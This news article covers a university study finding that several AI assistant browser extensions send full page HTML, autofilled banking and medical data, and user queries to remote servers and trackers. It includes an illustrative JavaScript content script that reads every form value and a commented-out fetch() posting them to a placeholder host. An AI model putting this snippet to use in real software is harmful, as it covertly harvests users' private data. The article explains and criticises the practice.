Publication date: 19.08.2025 13:56:00
A joint study by four universities — UC Davis (USA), University College London (UK), Universidad Carlos III de Madrid (Spain) and the Mediterranea University of Reggio Calabria (Italy) — has revealed large-scale data leaks through AI assistants in browsers.
The findings concern popular extensions such as Merlin, Monica, Sider, TinaMind and ChatGPT for Google. They promise help with navigation and content analysis, but in exchange they gain access to all of your online activity.
Scientists modeled the behavior of an ordinary user — from searching for information to online banking — and found that assistants transmit the full HTML content of pages to servers, including autofill form data.
In the case of Merlin, even online banking details and medical information were recorded. Some extensions continued to collect data even in incognito mode.
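The mechanism behind these leaks can be sketched in a few lines. The snippet below is an illustration, not code from the study or from any of the named extensions: a content script with broad host permissions can serialize the entire live DOM, and because browser autofill writes values directly into form fields, banking and medical details travel along with the HTML. The function name `collectPageData` and the endpoint URL are hypothetical.

```javascript
// Illustrative sketch of how an extension content script with broad host
// permissions could capture a page. Names and the endpoint are hypothetical.
const EXFIL_URL = "https://assistant.example.invalid/ingest"; // placeholder

function collectPageData(doc) {
  // The full serialized HTML of the current page, as the study observed
  // being transmitted to remote servers.
  const html = doc.documentElement.outerHTML;

  // Autofilled values live in the DOM, so reading inputs picks them up too,
  // including card numbers or medical form fields.
  const formValues = Array.from(doc.querySelectorAll("input")).map((input) => ({
    name: input.name,
    value: input.value, // includes browser-autofilled data
  }));

  return { html, formValues };
}

// In a real extension this would run as a content script on every page and
// ship the payload off with a single request, with no user action required:
// fetch(EXFIL_URL, { method: "POST", body: JSON.stringify(collectPageData(document)) });
```

Incognito mode does not change any of this: unless the user explicitly disallows an extension in private windows, its content scripts see the same DOM there as anywhere else.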
Sider and TinaMind also shared IP addresses and user queries with external trackers, including Google Analytics, which creates conditions for cross-site tracking.
Most assistants do not use local models but work through remote APIs, which can be called automatically, without explicit user action.
Some tools analyze behavior and build a demographic profile: age, gender, income, interests. This data is used to personalize responses.
Only one assistant, Perplexity, showed no signs of collecting data for profiling. The rest violate basic privacy expectations.
The authors emphasize that such practices require urgent regulatory oversight. In the EU and the UK, they would likely violate standards such as GDPR.
Users should carefully study the permissions of browser extensions and avoid those that work through third-party servers without transparent usage policies. An AI assistant should not become a digital spy.